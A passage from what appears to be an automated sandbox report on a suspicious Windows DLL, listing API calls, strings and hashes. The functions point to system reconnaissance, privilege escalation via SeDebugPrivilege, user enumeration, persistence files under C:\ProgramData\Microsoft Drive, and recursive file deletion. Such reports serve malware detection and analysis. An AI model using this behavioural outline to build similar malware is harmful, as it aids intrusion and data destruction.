                                                    • Part of subcall function 1001A8F0: lstrlenA.KERNEL32(?,?,?,?,?,?,00000000,755723A0), ref: 1001AA07
                                                  • getsockname.WS2_32(?), ref: 1001B2F6
                                                  • GetSystemInfo.KERNEL32(?,?,?,00000100,?,00000010,00000004), ref: 1001B363
                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B384
                                                  • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3CF
                                                  • GetDiskFreeSpaceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1001B3EA
                                                  • GetTickCount.KERNEL32 ref: 1001B496
                                                  • wsprintfA.USER32 ref: 1001B4B8
                                                  • wsprintfA.USER32 ref: 1001B4DF
                                                  • wsprintfA.USER32 ref: 1001B504
                                                  • wsprintfA.USER32 ref: 1001B52B
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B54C
                                                    • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAA6
                                                    • Part of subcall function 1001AA20: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAE3
                                                    • Part of subcall function 1001AA20: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AAF3
                                                    • Part of subcall function 1001AA20: ReadFile.KERNEL32(00000000,?,00000000,?,00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB03
                                                    • Part of subcall function 1001AA20: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB0A
                                                    • Part of subcall function 1001AA20: lstrlenA.KERNEL32(?,?,?,?,?,00000000,755683C0,755732C0,755723A0), ref: 1001AB11
                                                  • lstrcpyA.KERNEL32(?,?,?,00000100), ref: 1001B5B9
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B5C9
                                                  • GetLastInputInfo.USER32(?), ref: 1001B5E3
                                                  • GetTickCount.KERNEL32 ref: 1001B5E9
                                                  • _access.MSVCRT ref: 1001B608
                                                  • lstrcpyA.KERNEL32(?,00000000), ref: 1001B62B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$lstrlen$lstrcpywsprintf$CloseCountCreateFreeHandleInfoLibraryReadSizeTick$AddressDiskDriveGlobalInputLastLoadMemoryProcSpaceStatusSystemTypeVersion_accessgethostnamegetsockname
                                                  • String ID: %$@$C:\ProgramData\jerrt.txt$D$Default$a$d$e$f$f$l$t$u
                                                  • API String ID: 429165215-739913618
                                                  APIs
                                                  • Sleep.KERNEL32(00000BB8,?,?,?,?,?,10098BF2,000000FF), ref: 1001D4C8
                                                  • sprintf.MSVCRT ref: 1001D4E7
                                                    • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001D540
                                                  • GetFileAttributesA.KERNEL32(?), ref: 1001D595
                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001D5AB
                                                  • wsprintfA.USER32 ref: 1001D5D2
                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001D5E7
                                                  • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001D5F3
                                                  • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D601
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001D608
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                    • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                    • Part of subcall function 1001D390: EnumWindows.USER32(1001D150,?), ref: 1001D3A0
                                                  • Sleep.KERNEL32(000003E8), ref: 1001D64B
                                                  • Sleep.KERNEL32(000186A0), ref: 1001D665
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D67F
                                                  • GetTickCount.KERNEL32 ref: 1001D681
                                                  • GetTickCount.KERNEL32 ref: 1001D6AC
                                                  • GetTickCount.KERNEL32 ref: 1001D6F1
                                                  • GetTickCount.KERNEL32 ref: 1001D735
                                                  • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D758
                                                  • GetTickCount.KERNEL32 ref: 1001D77B
                                                  • Sleep.KERNEL32(00000096,?,00000001), ref: 1001D79A
                                                  • GetTickCount.KERNEL32 ref: 1001D7B7
                                                  • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7C5
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001D7DA
                                                  • #825.MFC42(?), ref: 1001D866
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep$CountTick$Create$AttributesFileMutex$#825CloseD@2@@std@@D@std@@DirectoryEnumErrorEventGrow@?$basic_string@HandleLastObjectReleaseSingleStartupU?$char_traits@V?$allocator@WaitWindowssprintfsrandtimewsprintf
                                                  • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive1$MyService1$e
                                                  • API String ID: 287845118-1910566113
                                                  • Opcode ID: 2d8dbbc255a1238c5a8ff77599e22bcbf11bc0636042b5c2565333a65060a181
                                                  • Instruction ID: 3369aabaadd7fa8e5de05b1f1d76e7fee78a4b58f25324653434795142b70bee
                                                  • Opcode Fuzzy Hash: 2d8dbbc255a1238c5a8ff77599e22bcbf11bc0636042b5c2565333a65060a181
                                                  • Instruction Fuzzy Hash: F0A1B1351083818FE320FF748C85B9EB7E4EB85744F44492DF9899B281EB75E949CB62
                                                  APIs
                                                    • Part of subcall function 1001D890: GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                    • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D8C3
                                                    • Part of subcall function 1001D890: strrchr.MSVCRT ref: 1001D904
                                                    • Part of subcall function 1001D890: isdigit.MSVCRT ref: 1001D93C
                                                    • Part of subcall function 1001D890: memmove.MSVCRT(?,?), ref: 1001D95D
                                                  • CreateThread.KERNEL32(00000000,00000000,1001D4A0,00000000,00000000,00000000), ref: 1001DAA4
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,10098C22,000000FF), ref: 1001DAB4
                                                  • sprintf.MSVCRT ref: 1001DAD3
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1001DB2C
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1001DB4F
                                                    • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                    • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                    • Part of subcall function 1001D3B0: time.MSVCRT(00000000,1001DC1C), ref: 1001D3B2
                                                    • Part of subcall function 1001D3B0: srand.MSVCRT ref: 1001D3B9
                                                  • GetFileAttributesA.KERNEL32(?), ref: 1001DB83
                                                  • CreateDirectoryA.KERNEL32(?,00000000), ref: 1001DB99
                                                  • wsprintfA.USER32 ref: 1001DBC0
                                                  • CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,00000001), ref: 1001DBD5
                                                  • GetLastError.KERNEL32(?,?,?,?,00000001), ref: 1001DBE1
                                                  • ReleaseMutex.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBEF
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000001), ref: 1001DBF6
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DC3A
                                                  • GetTickCount.KERNEL32 ref: 1001DC40
                                                  • GetTickCount.KERNEL32 ref: 1001DC67
                                                  • GetTickCount.KERNEL32 ref: 1001DCAC
                                                  • GetTickCount.KERNEL32 ref: 1001DCF0
                                                  • GetTickCount.KERNEL32 ref: 1001DD0E
                                                  • Sleep.KERNEL32(00000064,?,00000001), ref: 1001DD2A
                                                  • GetTickCount.KERNEL32 ref: 1001DD46
                                                  • WaitForSingleObject.KERNEL32(?,00000064,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD54
                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 1001DD69
                                                  • #825.MFC42(?), ref: 1001DE12
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CountTick$Create$Sleep$CloseD@2@@std@@D@std@@FileHandleMutexU?$char_traits@V?$allocator@strrchr$#825AttributesDirectoryEos@?$basic_string@ErrorEventGrow@?$basic_string@LastModuleNameObjectReleaseSingleStartupThreadWaitisdigitmemmovesprintfsrandtimewsprintf
                                                  • String ID: %s:%d:%s$1.0.0$C:\ProgramData\%d.ini$C:\ProgramData\Microsoft Drive$MyService$e
                                                  • API String ID: 4188121392-1841343700
                                                  • Opcode ID: 71693cf316dece4956bf05091169f15765b1d0146be7488c9e825e56bf82e074
                                                  • Instruction ID: 5ffaa32049bab8ff11e882cd0e0276c61fe5d34f044753baf71bd89b66df33c0
                                                  • Opcode Fuzzy Hash: 71693cf316dece4956bf05091169f15765b1d0146be7488c9e825e56bf82e074
                                                  • Instruction Fuzzy Hash: C7A1F6751083419BE320FF68CC85BABB7E4EF95744F04091DF9898B191DB75E988C762
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Event
                                                  • String ID: /*/$C:\ProgramData\Microsoft Drive\De.ini$Loop stopped as 1.txt does not exist.$Received command to stop loop. De.ini deleted.$jieshuxunhuan
                                                  • API String ID: 4201588131-4242312597
                                                  • Opcode ID: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                  • Instruction ID: 368dbf102333d3f33aab7b414df493a5988d33fb55c3cd96ca69a7f772dd8b24
                                                  • Opcode Fuzzy Hash: cd35a89f4f8be346bd41b26d9235ab9bc9cdfa24ee5166abe599360f9c5a6fc0
                                                  • Instruction Fuzzy Hash: 2771F7B5604209AFF340DF389C81D9F77DCEF95295F040629F98E93246EB21F94897A2
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 1000BD7E
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001), ref: 1000BDA0
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001), ref: 1000BDC3
                                                  • ?_Xran@std@@YAXXZ.MSVCP60(?,00000001), ref: 1000BDDB
                                                  • ?_Freeze@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXXZ.MSVCP60(?,00000001), ref: 1000BDE5
                                                  • ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ID@Z.MSVCP60(00000001,0000005C,?,00000001), ref: 1000BDFD
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000001,*.*,?,00000001), ref: 1000BE12
                                                  • FindFirstFileA.KERNEL32(?,?), ref: 1000BE2C
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE3A
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 1000BE52
                                                  • _strcmpi.MSVCRT ref: 1000BE80
                                                  • _strcmpi.MSVCRT ref: 1000BE97
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BEB3
                                                  • #825.MFC42(?), ref: 1000BF08
                                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,?), ref: 1000BF2D
                                                  • DeleteFileA.KERNEL32(?), ref: 1000BF42
                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 1000BF7B
                                                  • FindClose.KERNEL32(00000000), ref: 1000BF8A
                                                  • RemoveDirectoryA.KERNEL32(?), ref: 1000BF98
                                                  • #825.MFC42(?), ref: 1000BFBA
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$D@2@@0@FileFindHstd@@Tidy@?$basic_string@V10@V?$basic_string@$#825_strcmpi$?append@?$basic_string@CloseDeleteDirectoryEos@?$basic_string@FirstFreeze@?$basic_string@Grow@?$basic_string@NextRemoveV12@Xran@std@@
                                                  • String ID: *.*
                                                  • API String ID: 2724700886-438819550
                                                  • Opcode ID: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                  • Instruction ID: 3864407029e8fe6deab90730e0e99c0bea179ee7459791ed1101209935cd539f
                                                  • Opcode Fuzzy Hash: ad1961a91edd804f932eaf2f8cfb1b55517e5a9efd2cd6c5a4194da2198bfaeb
                                                  • Instruction Fuzzy Hash: F371E2754087859FE710DF24CC94AEEBBE4FB84380F444A2DF985872A5DB31A909CF52
                                                  APIs
                                                  • GetWindowLongA.USER32(?,000000EB), ref: 10002357
                                                  • PostQuitMessage.USER32(00000000), ref: 10002387
                                                  • SetWindowLongA.USER32(?,000000EB,?), ref: 100023A9
                                                  • GetModuleHandleA.KERNEL32(00000000,00000066), ref: 100023B3
                                                  • LoadIconA.USER32(00000000), ref: 100023BA
                                                  • SetClassLongA.USER32(?,000000F2,00000000), ref: 100023C4
                                                  • DestroyWindow.USER32(?), ref: 100023EA
                                                  Strings
                                                  • %s %d/%d/%d %d:%02d:%02d %s, xrefs: 10002513
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LongWindow$ClassDestroyHandleIconLoadMessageModulePostQuit
                                                  • String ID: %s %d/%d/%d %d:%02d:%02d %s
                                                  • API String ID: 3894596752-2160474225
                                                  • Opcode ID: 1df45b0cbe7480826528f3af86080661679982990957d4321143eb1b41b224bf
                                                  • Instruction ID: 913433c1a196e8c17d4762009bd36f23bd83a96a7512fdbe89ff7e8246f26fd0
                                                  • Opcode Fuzzy Hash: 1df45b0cbe7480826528f3af86080661679982990957d4321143eb1b41b224bf
                                                  • Instruction Fuzzy Hash: 755122765046166FF321CB28CCC5FFB77ACFF48351F084635FA4AD21C2CA69A9098661
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                  • lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                  • strstr.MSVCRT ref: 1002AC63
                                                  • GetPrivateProfileStringA.KERNEL32(InternetShortcut,URL,1012B024,?,00000104,?), ref: 1002ACB3
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002ACBD
                                                  • lstrlenA.KERNEL32(?), ref: 1002ACC6
                                                  • LocalSize.KERNEL32(?), ref: 1002ACDC
                                                  • LocalReAlloc.KERNEL32(?,-00000400,00000042), ref: 1002ACF5
                                                  • lstrlenA.KERNEL32(?), ref: 1002AD05
                                                  • lstrlenA.KERNEL32(?), ref: 1002AD2F
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002AD49
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002AD79
                                                  • FindNextFileA.KERNEL32(?,?), ref: 1002AD95
                                                  • FindClose.KERNEL32(?), ref: 1002ADA4
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Find$FileLocallstrcat$AllocCloseFirstNextPrivateProfileSizeStringstrstr
                                                  • String ID: .$.url$InternetShortcut$URL$\*.*
                                                  • API String ID: 3365753205-65308377
                                                  • Opcode ID: 71ef5b7e3128689d1d3063d88393cca5a54974f0cc1083af4269ccdbb3d3c9be
                                                  • Instruction ID: 3beaf7f51b6d9f7d8a427c2ba6f10f9899865e4eaa90444da4ba9e9e6c3921a7
                                                  • Opcode Fuzzy Hash: 71ef5b7e3128689d1d3063d88393cca5a54974f0cc1083af4269ccdbb3d3c9be
                                                  • Instruction Fuzzy Hash: CB6115352046449FD729CB24CC85AEB73E6FBC4305F544A1DFA4AA3690DF74A90AC745
                                                  APIs
                                                  • lstrlenA.KERNEL32(?,?,?,00000000,00000065), ref: 100092C6
                                                  • wsprintfA.USER32 ref: 1000931C
                                                  • FindFirstFileA.KERNEL32(?,?,100FA614,?,00000000,00000065), ref: 1000932E
                                                  • wsprintfA.USER32 ref: 10009390
                                                  • wsprintfA.USER32 ref: 100093BC
                                                  • SetFileAttributesA.KERNEL32(?,00000080), ref: 100093D6
                                                  • DeleteFileA.KERNEL32(?), ref: 100093E4
                                                  • FindNextFileA.KERNEL32(?,?), ref: 100093F4
                                                  • FindClose.KERNEL32(?), ref: 10009407
                                                  • RemoveDirectoryA.KERNEL32(?), ref: 1000940E
                                                  Strings
                                                  Yara matches
                                                  Similarity
                                                  • API ID: File$Findwsprintf$AttributesCloseDeleteDirectoryFirstNextRemovelstrlen
                                                  • String ID: %$%$%$%$%$.$.
                                                  • API String ID: 1639472542-2249276185
                                                  • Opcode ID: 483abd1fc68d701807be19a5b0fc12024f82d1ce920088ab265a87c25778453c
                                                  • Instruction ID: e9f610893c7e17eea17758c5bff720cce9e31774817f5124bb61c29f53aa675d
                                                  • Opcode Fuzzy Hash: 483abd1fc68d701807be19a5b0fc12024f82d1ce920088ab265a87c25778453c
                                                  • Instruction Fuzzy Hash: 00417F7100D3C19AE711CB64DC48AEBBBE8ABD6344F084A5DF5C893281D6759608C76B
                                                  APIs
                                                  • FindWindowA.USER32(?,00000000), ref: 1001A481
                                                  • GetWindowTextA.USER32(00000000,755732F0,00000104), ref: 1001A4DC
                                                  • GetWindow.USER32(00000000,00000002), ref: 1001A586
                                                  • GetClassNameA.USER32(00000000,755732F0,00000104), ref: 1001A595
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001A5A4
                                                  • wsprintfA.USER32 ref: 1001A619
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\Destop.ini,?,00000001), ref: 1001A6C7
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\De.ini,?,00000001), ref: 1001A73B
                                                  • GetFileAttributesA.KERNEL32(C:\ProgramData\Microsoft Drive\id.ini,?,00000001), ref: 1001A774
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AttributesFileWindow$ClassCloseFindHandleNameTextwsprintf
                                                  • String ID: %s $C:\ProgramData\Microsoft Drive\De.ini$C:\ProgramData\Microsoft Drive\Destop.ini$C:\ProgramData\Microsoft Drive\id.ini$CTXOPConntion_Class$qq.exe
                                                  • API String ID: 2156150844-4244366814
                                                  • Opcode ID: 3d8acf8595d7b5b8568be87e98653658b69e9c91e80da6a7d25cfd14f60d6978
                                                  • Instruction ID: cccadfd23874176e6e13de45dca2d6dba1ce18e4c81b552adfb9ff591e04c6bf
                                                  • Opcode Fuzzy Hash: 3d8acf8595d7b5b8568be87e98653658b69e9c91e80da6a7d25cfd14f60d6978
                                                  • Instruction Fuzzy Hash: 6291F736604A081BC72CC57858556AB76C3EBC5370FA9073DFA6BDB2D1DEB8CD898240
                                                  APIs
                                                  • GetLogicalDriveStringsA.KERNEL32 ref: 10008E7D
                                                  • GetUserNameA.ADVAPI32(?,?), ref: 10008EA9
                                                  • _strcmpi.MSVCRT ref: 10008EBC
                                                  • SHGetFolderPathA.SHELL32(00000000,00000010,00000000,00000000,?), ref: 10008EE7
                                                  • CloseHandle.KERNEL32(00000000), ref: 10008EEE
                                                  • lstrlenA.KERNEL32(?), ref: 10008F02
                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?,00000104), ref: 10008F3D
                                                  • SHGetFileInfoA.SHELL32(?,00000080,?,00000160,00000410), ref: 10008F5B
                                                  • lstrlenA.KERNEL32(?), ref: 10008F69
                                                  • lstrlenA.KERNEL32(?), ref: 10008F77
                                                  • GetDiskFreeSpaceExA.KERNEL32(00000001,?,?,00000000), ref: 10008F96
                                                  • GetDriveTypeA.KERNEL32(?), ref: 10008FDD
                                                  • lstrlenA.KERNEL32(?), ref: 10009047
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$Drive$CloseDiskFileFolderFreeHandleInfoInformationLogicalNamePathSpaceStringsTypeUserVolume_strcmpi
                                                  • String ID: SYSTEM$g
                                                  • API String ID: 545482129-3120117691
                                                  • Opcode ID: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                  • Instruction ID: c8429926c63601f6ea7d8031317dae8df0805160766070a83ab6d3e18fb45688
                                                  • Opcode Fuzzy Hash: df723ad6942873d95c7a4638fbedeeb3016da053a09685ffa93ad8dbc41845db
                                                  • Instruction Fuzzy Hash: 6B5180715083499FD710DF24C880AEBBBE9FBC8344F444A2DFA8997251D770AA09CB66
                                                  APIs
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                  • NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 10025511
                                                  • wcstombs.MSVCRT ref: 10025552
                                                  • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002556E
                                                  • NetApiBufferFree.NETAPI32(000000FF,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 1002558A
                                                  • LocalAlloc.KERNEL32(00000040,00000400,00000000,00000000,00000002,?,000000FF,?,?,?,00000000,00000000), ref: 100255AB
                                                  • lstrlenA.KERNEL32(1012C7F0), ref: 1002561B
                                                  • lstrlenA.KERNEL32(1012C7F0), ref: 1002563C
                                                  • lstrlenA.KERNEL32(?), ref: 1002564F
                                                  • lstrlenA.KERNEL32(?), ref: 10025671
                                                  • lstrlenA.KERNEL32(?), ref: 10025684
                                                  • lstrlenA.KERNEL32(?), ref: 100256A2
                                                  • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 100256D6
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$AllocBufferFreeLocalProcessToken$AdjustCloseCurrentEnumErrorHandleLastLookupOpenPrivilegePrivilegesUserValuewcstombs
                                                  • String ID: SeDebugPrivilege
                                                  • API String ID: 2919970077-2896544425
                                                  • Opcode ID: 5109f0ce4481da27a2eccf9b04b91de86559a6b42d16cfb1df9be0e2de1b6923
                                                  • Instruction ID: 11b2664fd623328df788bc7664e7f7e03edf8d0c1f99df603ce68f2f2ecca6a9
                                                  • Opcode Fuzzy Hash: 5109f0ce4481da27a2eccf9b04b91de86559a6b42d16cfb1df9be0e2de1b6923
                                                  • Instruction Fuzzy Hash: 7A51D1726047169BC305DF58DC819ABB7E9FBC8700F84091DF986A7241DB35E90ACFA6
                                                  APIs
                                                  • Sleep.KERNEL32(0000000A), ref: 1000B8A6
                                                  • lstrlenA.KERNEL32(?), ref: 1000B8B1
